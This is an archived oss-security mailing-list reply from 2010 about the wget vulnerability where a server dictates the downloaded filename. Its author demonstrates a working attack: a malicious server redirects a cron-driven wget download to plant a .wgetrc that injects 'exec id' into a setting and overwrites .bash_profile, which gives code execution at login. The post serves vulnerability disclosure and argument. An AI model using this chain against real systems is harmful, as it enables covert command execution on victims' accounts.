[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] [oCERT-2010-001] multiple http client unexpected download filename vulnerability
From: Solar Designer <solar () openwall ! com>
Date: 2010-05-18 23:42:29
Message-ID: 20100518234229.GA13745 () openwall ! com
[Download RAW message or body]
On Tue, May 18, 2010 at 09:50:27AM +0200, Ludwig Nussel wrote:
> wget doesn't overwrite existing files by default anyways. Instead it appends a
> suffix .1, .2 etc to the newly downloaded file.
Well, a server can sometimes override that default - please see below.
> wget also prints the file name it used.
This is of limited help - and for interactive uses only. I am mostly
concerned about uses from cron jobs and the like.
> So IMO it's perfectly fine and useful for wget to take the server
> provided file name by default.
I disagree. Uses from scripts and cron jobs are too common, and they
often don't care to specify an output filename explicitly.
Let's suppose there's a cron job like this:
1 * * * * wget http://www.openwall.com/pvt/wget/log &> /dev/null
If the server is malicious or compromised, it can have:
RedirectMatch log $1/pvt/wget/.wgetrc
in .htaccess, and
reject=; exec id
output-document=.bash_profile
in .wgetrc. When the cron job runs for the first time after the above
changes made on the server, it does:
02:01:02 (2.64 MB/s) - `.wgetrc' saved [47/47]
At this point, .wgetrc is on the client system. The second time the
cron job runs, it does:
03:01:02 (2.99 MB/s) - `.bash_profile' saved [47/47]
This has happily overwritten my .bash_profile file.
(I replaced "/dev/null" in the cron job with another filename for
obtaining these wget output lines.)
When I am logging in to the affected account, I get the output of "id".
Of course, the shell command could as well be nastier than that.
Although I used a somewhat tricky approach in the above exploit,
eventually making wget overwrite a file, it is also possible to mount
attacks that do not rely on overwriting any files. Many programs
support optional startup/config files of fixed/known/guessable names
that a malicious or compromised server could provide. In fact, I've
just demonstrated this attack against wget itself, but it could also
work against another program.
Is this more convincing now?
Alexander
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic